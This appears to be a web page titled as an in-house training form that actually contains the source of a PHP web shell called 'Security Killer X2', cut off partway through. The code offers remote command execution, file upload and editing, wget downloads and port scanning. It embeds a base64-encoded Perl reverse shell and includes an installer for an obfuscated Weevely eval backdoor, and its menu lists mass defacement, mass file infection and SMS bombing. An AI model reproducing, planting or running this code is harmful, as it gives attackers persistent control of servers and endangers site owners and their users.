Inhouse Training Form |
|
<html>
<LINK rel="SHORTCUT ICON" href="http://upload.wikimedia.org/wikipedia/commons/thumb/9/90/National_emblem_of_Indonesia_Garuda_Pancasila.svg/85px-National_emblem_of_Indonesia_Garuda_Pancasila.svg.png">
<body>
<?php
$head = '
<html>
<head>
</script>
<title>Security Killer ++</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
background-image: url(http://indocyberattacker.org/background.gif);
background-repeat: repeat-x repeat-y;
background-position: left top;
font-size: 14px;
background-attachment: fixed;
font-family: sans;
color: red;
margin:0px 0px 0px 0px;
}
font-family: Courier New
}
tr {
BORDER: line 1px #333;
color: #FFF;
}
td {
BORDER: line 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: line 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : line 1px;
border-color : #333;
BACKGROUND-COLOR: #111111;
font: 9pt Verdana;
color: Red;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: #111111;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: #111111;
width: 30%;
color: #FFF;
}
textarea {
border : line 1px #333;
BACKGROUND-COLOR: #111111;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: #111111;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: line 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: transparent;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language='javascript'>
function hide_div(id)
{
document.getElementById(id).style.display = 'none'
document.cookie=id+'=0;'
}
function show_div(id)
{
document.getElementById(id).style.display = 'block'
document.cookie=id+'=1;'
}
function change_divst(id)
{
if (document.getElementById(id).style.display == 'none')
show_div(id);
else
hide_div(id);
}
</script>' ?>
<?php
error_reporting(0);
#chdir('');
//Some basic var's
if (!@$_GET['path']) {
$dir = CleanDir(getcwd());
} else {
$dir = CleanDir($_GET['path']);
}
$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
$domain = $_SERVER['HTTP_HOST'];
$script = $_SERVER['SCRIPT_NAME'];
$full_url = $_SERVER['REQUEST_URI'];
$script2 = basename($script);
$serverip = $_SERVER['SERVER_ADDR'];
$userip = $_SERVER['REMOTE_ADDR'];
$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
$disabled = ini_get('disable_functions');
//Perl back connect script by LorD
//Encoded in base64 for convenience
$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
@ini_set("memory_limit", "9999M");
@ini_set("max_execution_time", "0");
@ini_set("upload_max_filesize", "9999m");
@ini_set("magic_quotes_gpc", "0");
@set_magic_quotes_runtime(0);
set_time_limit(0);
if (empty($disabled)) {
$disabled = "None";
}
//Some functions
function CleanDir($directory) {
$directory = str_replace("\", "/", $directory);
$directory = str_replace("//", "/", $directory);
return $directory;
}
function success($for, $var1) {
$domain = $_SERVER['HTTP_HOST'];
$script = $_SERVER['SCRIPT_NAME'];
$full_url = $_SERVER['REQUEST_URI'];
if ($for == "filesave") {
$message = "File Saved!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "filedelete") {
$message = "File Deleted!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "createdir") {
$message = "Directory Created!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "dir_exists") {
$message = "Directory Already Exists!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "file_exists") {
$message = "File Already Exists!";
$redirect = "http://$domain$script?editfile=$var1";
}
if ($for == "file_created") {
$message = "File Created!";
$redirect = "http://$domain$script?editfile=$var1";
}
if ($for == "file_uploaded") {
$message = "File Uploaded!";
$redirect = "http://$domain$full_url";
}
if ($for == "shell_killed") {
$message = "Shell Killed!";
$redirect = "http://$domain$script";
}
if ($for == "dir_del") {
$message = "Directory Deleted!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "dir_renamed") {
$message = "Directory Renamed!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "file_renamed") {
$message = "File Renamed!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "configs_found") {
$message = "$var1 Configs Found!";
$redirect = "";
}
if ($for == "unzip") {
$message = "Successfully Unzipped File!";
$redirect = "http://$domain$script?path=$var1";
}
if ($for == "files_found") {
$message = "$var1 files found!";
$redirect = "";
}
if ($for == "weevely") {
$message = "Weevely BackDoor Installed!";
$redirect = "";
}
echo "<div id='xbox'><embed
src='http://p0wersurge.com/js/achievementnopic.swf'
width='300'
height='80'
flashvars='Text=$message&gs=1337'
wmode='transparent'/></div>";
if (empty($redirect)) {
echo "<script>
function remove (){
document.getElementById('xbox').innerHTML=''
}
setInterval(function(){remove();}, 2700);
</script>";
} else {
echo "<script>
function remove (){
window.location = '$redirect'
}
setInterval(function(){remove();}, 2500);
</script>";
}
}
function error($mesg) {
$error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
echo "$error";
}
function ByteConversion($bytes, $precision = 2) {
$kilobyte = 1024;
$megabyte = $kilobyte * 1024;
$gigabyte = $megabyte * 1024;
$terabyte = $gigabyte * 1024;
if (($bytes >= 0) && ($bytes < $kilobyte)) {
return $bytes . ' B'
} elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
return round($bytes / $kilobyte, $precision) . ' KB'
} elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
return round($bytes / $megabyte, $precision) . ' MB'
} elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
return round($bytes / $gigabyte, $precision) . ' GB'
} elseif ($bytes >= $terabyte) {
return round($bytes / $terabyte, $precision) . ' TB'
} else {
return $bytes . ' B'
}
}
//Mass File Function
function files($mass_dir) {
if ($dh = opendir($mass_dir)) {
$files = array();
$inner_files = array();
while ($file = readdir($dh)) {
if ($file != "." && $file != ".." && $file[0] != '.') {
if (is_dir($mass_dir . "/" . $file)) {
$inner_files = files("$mass_dir/$file");
if (is_array($inner_files)) $files = array_merge($files, $inner_files);
} else {
array_push($files, "$mass_dir/$file");
}
}
}
closedir($dh);
return $files;
}
}
//Upload File
if (isset($_POST['do_upload_file'])) {
$udir = $_POST['upload_location'];
$uname = $_FILES['upload_file']['name'];
$both = "$udir$uname";
if (file_exists($both)) {
success("file_exists", $both);
} else {
switch ($_FILES['upload_file']['error']) {
case 0:
if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
success("file_uploaded");
} else {
error("Failed To Upload File!");
}
}
}
}
//wget file
if (isset($_POST['do_wget_file'])) {
$wget_file = $_POST['wget_file'];
$wecmd = "wget $wget_file";
$wget_ecmd = cmd2($wecmd, $dir);
echo "<center><font color='#14ab00'>
Result:<br>
<textarea rows='20' cols='150' name='massdeface_source' style='color:#000'>
$wget_ecmd
</textarea></font></center><br><br>";
}
//Execute command
function cmd2($cmd, $path) {
chdir($path);
$disabled = ini_get('disable_functions');
if (empty($disabled)) {
$disabled = "None";
}
if ($disabled == "None") {
$execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!feof($io[1])) {
$res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($execute);
return $res;
} elseif (function_exists("proc_open")) {
$execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while (!feof($io[1])) {
$res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($execute);
return $res;
} elseif (function_exists("exec")) {
$res = exec($cmd);
return $res;
} elseif (function_exists("system")) {
$res = system($cmd);
return $res;
} elseif (function_exists("shell_exec")) {
$res = shell_exec($cmd);
return $res;
} elseif (function_exists("passthru")) {
$res = passthru($cmd);
return $res;
} else {
error("The necessary functions to execute commands are disabled!");
}
}
//Unzip function
function unzip($filename, $directory) {
$zip = new ZipArchive;
$res = $zip->open($filename);
if ($res === TRUE) {
$zip->extractTo($directory);
$zip->close();
success("unzip", $directory);
} else {
cmd2("unzip $filename", $directory);
}
}
//Get files and directories and throw them into an array.
$open = opendir($dir);
$files = array();
$direcs = array();
while ($file = readdir($open)) {
if ($file != "." && $file != "..") {
if (is_dir("$dir/$file")) {
array_push($direcs, $file);
} else {
array_push($files, $file);
}
}
}
asort($direcs);
asort($files);
?>
<html>
<head>
<?php
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=red size=8 face="Wallpoet"><b>Security</font><font color=white size=8 face="Wallpoet"><b> Killer</font><font color=green size=8 face="Wallpoet"><b> X2 </font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="3"><b>
<font color=red>
[+] We kill your security [+]
</table>
'
?>
<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>Second Generation of Security Killer Shell</font><br></td></tr></table>
</head>
<p></p>
<p></p>
<body bgcolor="black"><body bgcolor="black">
<table border=1 width=100%><td width=15% align=right><font color=red size=2 face="comic sans ms">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=2>".php_uname() ;?> <br><?php echo "<font size=2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none' echo $r;?>
</table><?php echo $head ; ?><table width=100%><tr><td align=center width=60%>
</table>
<center><div id="menu">
<a href="<?php echo '?'?>"><font size=4 face="Wallpoet" color=white> [Home] </font></a>
<a href="<?php echo '?perlbackconnect'?>"><font size=4 face="Wallpoet" color=red> [Perl Back Connect] </font></a>
<a href="<?php echo '?pythonbackconnect'?>"><font size=4 face="Wallpoet" color=white> [Python Back connect] </font></a>
<a href="<?php echo '?encrypt'?>"><font size=4 face="Wallpoet" color=red> [Encrypt] </font></a>
<a href="<?php echo '?massdeface'?>"><font size=4 face="Wallpoet" color=white> [Mass Deface] </font></a>
<a href="<?php echo '?massinfect'?>"><font size=4 face="Wallpoet" color=red> [Mass File Infect] </font></a>
<a href="<?php echo '?installMySQL'?>"><font size=4 face="Wallpoet" color=white> [Install MSD] </font></a>
<p></p>
<a href="<?php echo '?sms'?>"><font size=4 face="Wallpoet" color=red> [SMS Bomber] </font></a>
<a href="<?php echo '?domaininfo'?>"><font size=4 face="Wallpoet" color=white> [Reverse IP] </font></a>
<a href="<?php echo '?weev'?>"><font size=4 face="Wallpoet" color=red> [Weevely Backdoor] </font></a>
<a href="<?php echo '?scan'?>"><font size=4 face="Wallpoet" color=white> [Port Scan] </font></a>
</div></center>
<p></p>
<p></p>
<p></p>
<?php
if (isset($_GET['encrypt'])) {
echo "<form action='' method='post'>
<center><font color='#14ab00'>
<input type='text' name='en_string' class='text'>
<input type='submit' name='do_encrypt' value='Encrypt String'>
</form>
</font></center>";
}
if (isset($_POST['do_encrypt'])) {
$vbsalt = gen_salt("30");
$vbsalt2 = gen_salt("3");
$mybbsalt = gen_salt("8");
$ipbsalt = gen_salt("5");
$joomlasalt = gen_salt("32");
$password = $_POST['en_string'];
$md5 = md5($password);
$md52 = md5(md5($password));
$md53 = md5(md5(md5($password)));
$sha1 = sha1($password);
$sha256 = hash('sha256', $password);
$vbalg = md5(md5($password) . $vbsalt);
$vbalg2 = md5(md5($password) . $vbsalt2);
$mybbalg = md5(md5($mybbsalt) . $password);
$ipbalg = md5(md5($ipbsalt) . md5($password));
$joomlaalg = md5($password . $joomlasalt);
$en_result = "Hashes for string: $password
MD5: $md5
md5(md5(pass)): $md52
md5(md5(md5(pass))): $md53
SHA-1: $sha1
SHA-256: $sha256
vBulletin 4: $vbalg:$vbsalt
vBulletin 3: $vbalg2:$vbsalt2
MyBB: $mybbalg:$mybbsalt
IPB: $ipbalg:$ipbsalt
Joomla 1.0.13+: $joomlaalg:$joomlasalt
";
echo "<center>
<textarea rows='20' cols='150' style='color:#00ff00'>
$en_result
</textarea>
</center><br>";
}
?>
<?php
//Port scan
if (isset($_GET['scan'])) {
echo "<center><font color='#14ab00' size='3'>
Port Scan:<br>
<form action='' method='post'>
Host: <input type='text' name='scan_host' class='text' value='$domain'><br>
Start port: <input type='text' name='start_port' class='text' size='6'>
End port: <input type='text' name='end_port' class='text' size='7'><br>
<input type='submit' name='start_scan' value='Scan'>
</form>
</font>
</center>";
}
if (isset($_POST['start_scan'])) {
$scanhost = $_POST['scan_host'];
$startport = $_POST['start_port'];
$endport = $_POST['end_port'];
while ($startport <= $endport) {
if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) {
echo "<font color='green' size='3'>Port $startport is open on $scanhost</font><br>";
} else {
echo "<font color='red' size='3'>Port $startport is not open on $scanhost</font><br>";
}
$startport++;
}
}
?>
<?php
//Edit file stuff
if (!empty($_GET['editfile'])) {
$edfile = $_GET['editfile'];
$redirectloc = dirname($edfile);
echo "<form method='POST'><center>";
if (file_exists($edfile)) {
if (get_magic_quotes_gpc()) {
$file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
} else {
$file_content = htmlspecialchars(file_get_contents($edfile));
}
if (is_writeable($edfile)) {
echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#00ff00'>$file_content</textarea>
<br><br>
<input type='submit' name='savedit' value='Save' />
<input type='submit' name='deletefile' value='Delete' />
</form></center>";
if (isset($_POST['savedit'])) {
if (get_magic_quotes_gpc()) {
$edfilecontent = stripslashes($_POST['edfile_contents']);
} else {
$edfilecontent = $_POST['edfile_contents'];
}
if (file_put_contents($edfile, $edfilecontent)) {
success("filesave", rtrim($redirectloc, "/"));
} else {
error("Failed to save file!");
}
} else if (isset($_POST['deletefile'])) {
if (unlink($edfile)) {
success("filedelete", rtrim($redirectloc, '/'));
} else {
error("Failed to delete file!");
}
}
} else {
echo "<font color='red'><b>File is read only!</b></font><br>
<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
}
echo "</center>";
} else {
echo "<form method='POST'><center>";
echo "<font color='red'><b>File does not exist!</b></font><br>
<textarea rows='20' cols='150' name='newfile_contents' style='color:#00ff00'>
</textarea><br><br>
<input type='submit' name='savefile' value='Create File' /><br /><br />
</form></center>";
if (isset($_POST['savefile'])) {
if (get_magic_quotes_gpc()) {
$newfilecontent = stripslashes($_POST['newfile_contents']);
} else {
$newfilecontent = $_POST['newfile_contents'];
}
if (file_put_contents($edfile, $newfilecontent)) {
success("filesave", rtrim($redirectloc, "/"));
} else {
error("Failed to save file!");
}
}
}
}
?>
<?php
//Weevely backdoor
if (isset($_GET['weev'])) {
echo "<center><font color='#14ab00' size='3'>
<form action='' method='post'>
Directory to install weevely backdoor:<br>
<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
Name of file (something .php):<br>
<input type='text' name='weev_name' class='text' value='weevely.php'><br>
Password (more than 3 characters):<br>
<input type='text' name='weev_pass' class='text'><br>
<input type='submit' name='install_weev' value='BackDoor'><br>
</font>
</center>";
}
if (isset($_POST['install_weev'])) {
$weevdir = rtrim($_POST['weev_dir'], '/');;
$weevname = $_POST['weev_name'];
$weevpassword = $_POST['weev_pass'];
if (strlen($weevpassword) < 3) {
error("Password must be longer than 3 characters!");
} else {
$first2 = $weevpassword[0] . $weevpassword[1];
$rest = substr($weevpassword, 2);
$money = "$";
$weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
$weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
$weevelybd3 = "$money" . "k='$rest'";
$weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
$all = "<?php
eval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));
?>";
if (file_put_contents($weevdir . '/' . $weevname, $all)) {
echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
success("weevely");
} else {
error("Failed to write backdoor to $weevdir");
}
}
}
?>
<?php
//Domain information
//Get domains hosted on server from yougetsignal.com
if (isset($_GET['domaininfo'])) {
echo "<font color='#14ab00' size='3'>";
$dns_record = dns_get_record($domain, DNS_ANY, $authns, $addtl);
$num = 0;
$count = sizeof($dns_record);
echo "<br></b><br>";
while ($num < $count) {
$name_servers = $dns_record[$num];
$name_servers2 = $name_servers['type'];
$name_servers3 = @$name_servers['target'];
$num++;
if ($name_servers2 == "NS") {
echo "$name_servers3<br>";
$nshost = @$name_servers['host'];
}
if ($name_servers2 == "SOA") {
$nsemail = $name_servers['rname'];
}
if ($name_servers2 == "A") {
$nsip = $name_servers['ip'];
}
}
$num = 0;
echo "<br><table class='noborder'>
</table><br>";
$domains_on_server = json_decode(file_get_contents("http://www.yougetsignal.com/tools/web-sites-on-web-server/php/testing.php?remoteAddress=$domain"));
$status = $domains_on_server->status;
$message = $domains_on_server->message;
$domainAr = $domains_on_server->domainArray;
$num_of_site = $domains_on_server->domainCount;
$count = sizeof($domainAr);
if ($status == "Success") {
echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>:<br><br> <table class='noborder'>";
while ($num < $count) {
$hossites = $domainAr[$num];
$num++;
$hossites3 = $domainAr[$num];
$hossites3 = $hossites3[0];
$hossites = $hossites[0];
$site_ips = empty($hossites) ? "" : "(& |
|
|
Upcoming
Training Courses: |
 |
|
Contact Details |
|
|